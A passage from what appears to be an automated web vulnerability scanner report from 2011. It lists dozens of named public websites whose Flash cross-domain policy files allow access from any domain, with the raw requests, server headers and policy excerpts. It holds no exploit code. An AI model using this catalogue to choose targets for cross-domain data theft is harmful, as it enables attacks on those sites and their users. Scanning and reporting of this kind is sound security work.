Date: Sat, 02 Apr 2011 13:54:03 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2010 10:20:15 GMT
ETag: "12cc6f-67-493fb277695c0"
Accept-Ranges: bytes
Content-Length: 103
Vary: Accept-Encoding,User-Agent
Content-Type: application/xml
X-XTM-Node: pool-03-www-017033
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.24. http://www.bizjournals.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bizjournals.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:05 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 17:11:42 GMT
ETag: "cc-48d671c40cf80"
Accept-Ranges: bytes
Content-Length: 204
ServerID: 8
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.25. http://www.blackberry.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackberry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blackberry.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:46 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 21:59:07 GMT
ETag: "11eadd1-c7-496d91d17a0c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.26. http://www.blogs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogs.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 14:07:11 GMT
Server: Apache
Last-Modified: Wed, 16 Feb 2011 20:12:27 GMT
ETag: "b94708-eb-49c6be65b00c0"
Accept-Ranges: bytes
Content-Length: 235
Vary: Accept-Encoding
Content-Type: text/xml
Content-Language: en

<?xml version="1.0"?>
       

    <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       

    <cross-domain-policy>
       

    <allow-access-from domain="*" />
...[SNIP]...

7.27. http://www.bloomberg.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bloomberg.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Expires: Sun, 01 Apr 2012 13:23:23 GMT
Cache-Control: max-age=31536000
Content-Type: text/xml
Last-Modified: Wed, 07 Jul 2010 19:36:53 GMT
ETag: W/"ff-4c34d755"
Date: Sat, 02 Apr 2011 13:23:23 GMT
Content-Length: 255
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-http-request-header
...[SNIP]...

7.28. http://www.boostmobile.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boostmobile.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.boostmobile.com

Response

HTTP/1.1 200 OK
Content-Length: 220
Content-Type: text/xml
Last-Modified: Fri, 29 May 2009 18:38:10 GMT
Accept-Ranges: bytes
ETag: "e9bbdb9d8ce0c91:13e3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Access-Control-Allow-Origin: https://apps.boostmobile.com
Date: Sat, 02 Apr 2011 13:37:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" to-ports="*" />
</cr
...[SNIP]...

7.29. http://www.bravotv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bravotv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bravotv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Varnish: 424538094
Content-Type: text/xml
Varnish-X-Cache: MISS
ETag: "1f70023-13e-48d3cc9cc3480"
Last-Modified: Sat, 07 Aug 2010 14:42:10 GMT
Content-Length: 318
Cache-Control: max-age=281
Date: Sat, 02 Apr 2011 13:40:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.30. http://www.break.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.break.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.break.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 16 Jun 2006 02:53:41 GMT
ETag: "3ed36e13f090c61:b41f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 157
Date: Sat, 02 Apr 2011 12:38:46 GMT
X-Varnish: 396558551 396540669
Age: 124
Via: 1.1 varnish
Connection: close
X-Varnish-Host: varnish03
X-Client-IP: 173.193.214.243
X-Country: US

<?xml version="1.0"?>
<!-- http://content.break.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.31. http://www.buzznet.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.buzznet.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
Set-Cookie: bncom=173.193.214.243.68811301751865710; path=/; domain=.buzznet.com
Last-Modified: Sat, 01 May 2010 08:01:30 GMT
ETag: "ca-4bdbdfda"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

7.32. http://www.cafemom.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cafemom.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cafemom.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:28 GMT
Server: Apache
Last-Modified: Thu, 21 Jan 2010 22:10:57 GMT
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml; charset=utf-8

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

7.33. http://www.cbs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbs.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 13 Aug 2010 17:04:44 GMT
X-Real-Server: ws3182.drt.cbsig.net
Content-Type: application/xml
Cache-Control: max-age=248
Date: Sat, 02 Apr 2011 13:27:26 GMT
Content-Length: 1941
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-fro
...[SNIP]...
<allow-access-from domain="wwwimage.cbs.com" />
<allow-access-from domain="cbs.com" />
<allow-access-from domain="cgi.cbs.com" />
<allow-access-from domain="video.cgi.cbs.com" />
<allow-access-from domain="dev.cgi.cbs.com" />
<allow-access-from domain="dev.cbs.cbsig.net" />
<allow-access-from domain="www.cbsnews.com" />
<allow-access-from domain="wwwimage.cbsnews.com" />
<allow-access-from domain="cbsnews.com" />
<allow-access-from domain="cgi.cbsnews.com" />
<allow-access-from domain="video.cgi.cbsnews.com" />
<allow-access-from domain="*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="data.panachetech.com" />
<allow-access-from domain="data15.panachetech.com" />
<allow-access-from domain="*.panachetech.com" />
<allow-access-from domain="*.yourminis.com" />
<allow-access-from domain="vsallaccess.com" />
<allow-access-from domain="www.vsallaccess.com" />
<allow-access-from domain="*.vsallaccess.com" />
<allow-access-from domain="cbsstatic.dev.drt.cbsig.net" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="stage.drt.cbsig.net" />
<allow-access-from domain="*.broccolobster.com" />
...[SNIP]...

7.34. http://www.cbsinteractive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbsinteractive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbsinteractive.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:53 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 80
Keep-Alive: timeout=15, max=1000
Connection: Keep-Alive
Content-Type: application/xml

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.35. http://www.cbssports.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbssports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbssports.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:08 GMT
Server: Apache
Last-Modified: Sun, 27 Feb 2011 21:03:46 GMT
Accept-Ranges: bytes
Content-Length: 2798
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:25:08 GMT
X-Media: ws1373-fe.tm
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-access-from domain="sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbssports.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsimg.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsgames.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.ncaa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.maxpreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.trupreps.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.*.cbsig.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" />
<allow-access-from domain="*.g.akamai.net" />
<allow-access-from domain="beyond.download.akamai.com" />
<allow-access-from domain="cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbssports.com" secure="false" />
...[SNIP]...
<allow-access-from domain="cp32822.edgefcs.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="doubleclick.net" />
<allow-access-from domain="*.*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.*.2mdn.net" />
<allow-access-from domain="sandbox.dartmotif.com" />
<allow-access-from domain="my.22squared.com" />
...[SNIP]...

7.36. http://www.clear-request.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clear-request.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clear-request.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:15 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 15 Jan 2009 16:15:53 GMT
ETag: "4b90d7-cc-c5400040"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.37. http://www.cmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cmt.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 14 Aug 2008 20:11:47 GMT
ETag: "1c4250f-121-454711d5526c0"
Accept-Ranges: bytes
Content-Length: 289
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 13:38:06 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />

...[SNIP]...

7.38. http://www.colbertnation.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.colbertnation.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.colbertnation.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) PHP/5.3.1
Last-Modified: Wed, 13 Aug 2008 14:31:05 GMT
ETag: "160c686-102-454583d0d9c40"
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Cache-Control: max-age=386
Expires: Sat, 02 Apr 2011 14:25:35 GMT
Date: Sat, 02 Apr 2011 14:19:09 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.39. http://www.collegehumor.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.collegehumor.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:38 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 00:02:39 GMT
ETag: "9c073-235-49ea2612be5c0"
Accept-Ranges: bytes
Content-Length: 565
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="www.collegehumor.com" />
...[SNIP]...
<allow-access-from domain="dev.collegehumor.com" />
   <allow-access-from domain="staging.collegehumor.com" />
   <allow-access-from domain="collegehumor.com" />
   <allow-access-from domain="*.collegehumor.com" />
   <allow-access-from domain="*.cvcdn.com" />
   <allow-access-from domain="*" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.40. http://www.comedycentral.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comedycentral.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.comedycentral.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 258
Content-Type: text/xml
Last-Modified: Tue, 15 Apr 2008 20:09:33 GMT
ETag: "102-48050b7d"
Accept-Ranges: bytes
Cache-Control: max-age=72
Expires: Sat, 02 Apr 2011 13:38:15 GMT
Date: Sat, 02 Apr 2011 13:37:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-hea
...[SNIP]...

7.41. http://www.contactatonce.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.contactatonce.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.contactatonce.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:56 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 27 Jun 2010 23:26:28 GMT
ETag: "cb-48a0b5558d100"
Accept-Ranges: bytes
Content-Length: 203
Cache-Control: public, must-revalidate, proxy-revalidate
Expires: Sat, 09 Apr 2011 13:45:56 GMT
Vary: Accept-Encoding,User-Agent
Pragma: public
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.42. http://www.cracked.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cracked.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cracked.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.6
Last-Modified: Tue, 14 Jul 2009 21:42:53 GMT
ETag: "bf8fd0-6c-46eb15220f140"-gzip
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 13:33:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:14 GMT
Content-Length: 108
Connection: close
Set-Cookie: BIGipServerorigin.cracked.com=1083574538.20480.0000; path=/

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


7.43. http://www.crackle.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.crackle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.crackle.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Feb 2011 01:20:08 GMT
Accept-Ranges: bytes
ETag: "32a0dd238ad4cb1:f88"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Connection: close
Date: Sat, 02 Apr 2011 13:44:15 GMT
Age: 15631
Content-Length: 126

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


7.44. http://www.craveonline.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craveonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.craveonline.com

Response

HTTP/1.1 200 OK
Server: Apache/2
Vary: Accept-Encoding
X-Served-By: app1v-fe.sb.lax2
Content-Type: text/xml
Content-Length: 260
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 732507065
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy1v.sb.lax2

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.gorillanation.com --> <cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.45. http://www.curse.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curse.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1932476484.20480.0000; path=/
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 00:25:04 GMT
Accept-Ranges: bytes
ETag: "070209a1fd5ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:39:41 GMT
Xonnection: Xeep-alive
Content-Length: 332

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

7.46. http://www.daylife.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.daylife.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.daylife.com

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Content-Length: 140
Date: Sat, 02 Apr 2011 14:19:13 GMT
X-Varnish: 3945368514
Age: 0
Via: 1.1 varnish
Connection: close


<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.47. http://www.degrees.info/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.degrees.info
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.degrees.info

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:34 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 mod_ssl/2.2.8 OpenSSL/0.9.8g
Last-Modified: Wed, 16 Mar 2011 14:47:14 GMT
ETag: "52c1-db-49e9a9ed8c080"
Accept-Ranges: bytes
Content-Length: 219
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="true" />
</cro
...[SNIP]...

7.48. http://www.docstoc.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

